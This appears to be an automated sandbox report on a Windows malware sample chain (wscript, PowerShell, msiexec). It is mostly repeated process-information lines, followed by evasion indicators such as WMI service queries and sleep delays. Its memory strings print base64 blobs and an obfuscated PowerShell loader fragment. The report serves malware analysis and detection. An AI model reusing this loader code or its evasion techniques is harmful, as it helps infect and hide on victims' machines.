Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4909 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4961 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6094 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3758 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.2 %
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3004 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep count: 7445 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep time: -22335000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep count: 2540 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568 Thread sleep time: -7620000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_223210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_223210F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22326580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 7_2_22326580
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW, 10_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00418981 memset,GetSystemInfo, 10_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000000.00000002.2187705658.000002040E44D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup user ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27019GameDVR and Broadcast User Service_27019Bluetooth User Support Service_27019CaptureService_27019Clipboard User Service_27019Connected Devices Platform User Service_27019ConsentUX_27019CredentialEnrollmentManagerUserSvc_27019DeviceAssociationBroker_27019DevicePicker_27019DevicesFlow_27019MessagingService_27019Sync Host_27019Contact Data_27019PrintWorkflow_27019Udk User Service_27019User Data Storage_27019terinI
Source: msiexec.exe, 0000000A.00000003.2634007200.0000000004F11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: aMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0Vhp
Source: wscript.exe, 00000000.00000003.2186562250.000002040E46E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup user ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27019GameDVR and Broadcast User Service_27019Bluetooth User Support Service_27019CaptureService_27019Clipboard User Service_27019Connected Devices Platform User Service_27019ConsentUX_27019CredentialEnrollmentManagerUserSvc_27019DeviceAssociationBroker_27019DevicePicker_27019DevicesFlow_27019MessagingService_27019Sync Host_27019Contact Data_27019PrintWorkflow_27019O
Source: powershell.exe, 00000002.00000002.2303486839.000001ACE72E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QIRR5opfs+E8T4AqLl/QkrppJt/SUF9QQFvQygYr3ZK/2RZAv54XF9dd0JKd8l7WBuqAkIdf513zalEn113Qkuryw+q/hlE/113QkrqQOZvh2gv0Ap2RbQoP0pKHKifT1OQyFmwkU2mMUF78QFvQyUDai5CHXz4W8tO2F0feVcmFX9DsOFXxEzIE0pKHd7gP4d5lyYVf0K6qQhupCgTSkodQVdd4oC8SeBa2E3zTkWVG91dSg7TMLbWFPj/Gsg0FqsvzySzg4khp8pF/Wsj9BqQEexP6L5Vhh1/fH/WX1JIDj1kX/17QkuGoF5wd3DuXDsKck4dfg3rskNSS1+dbL1V67WCHX9CdCY8WlocHWdfDtl8Gg18nU35HG9QI2rSTh19UQ+9TYL3Rt4sOg1/oWA4CzCp97WB/gqEGAac5VVmCIgMxgqkScoKbd4Vr2wj0Lsy7xThpS7q13C+BiNurVINfjxnKQ2o2msvf9L6XONwVW9Abwne2q1/UnY49knmz6TlRaP5qOKQVW9AWctZVWodf0BJ63zmbTFvQyg7qVZOHX1lU0dRlF4Zf0PiGoGVah1/QeqKZ1JIO2uCTh1+2ZUG0gFXDe9jczpGUFl7epLaPQDTUrjnpSAYz9JrMQMG/Biv0moHRp9IChelQ7wj2kDhQ0IL2X9CSh1/Qkodf0JKHX9CSh1/Qkodf0JLlwhOI4yY96zTfH48zt7sJg19Zz5/UnYpLwMRwjWLsxXi/Ca11UTumozOrxMKWQDoyDdLx1qySGXg2dxBVhbL32eUj3h/0OPgWW9AbAsfQkoc531W3X9CSh1/Qkodf0JKHX9CSh1/Qkodf0JLq0nJTFvf4S3ZMJcLX5/C+aKblAEjdlL9PF8Exss71vLFacNAKjFmqd8vSozHnrM4Rb2gGgbQyPtDMScmYwMgiMDedcuRbC1PfUNGErV/Qkodf0JKHX9CSh1/Qkodf0JKHX9CS+AUz67bh60P027Yikpw9DxGm/6wo0yBEScdZL81d0JI4Al2D0Qxrz7wdnhN0SOgxVt4TPztAsBuUMHf+S+cqE2K7o3twSxCKbbHoKzMWq9u1YrPPTwaq5C1YQXAggtfO
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvF097.tmp.10.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000003.2183346178.000002040E466000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI 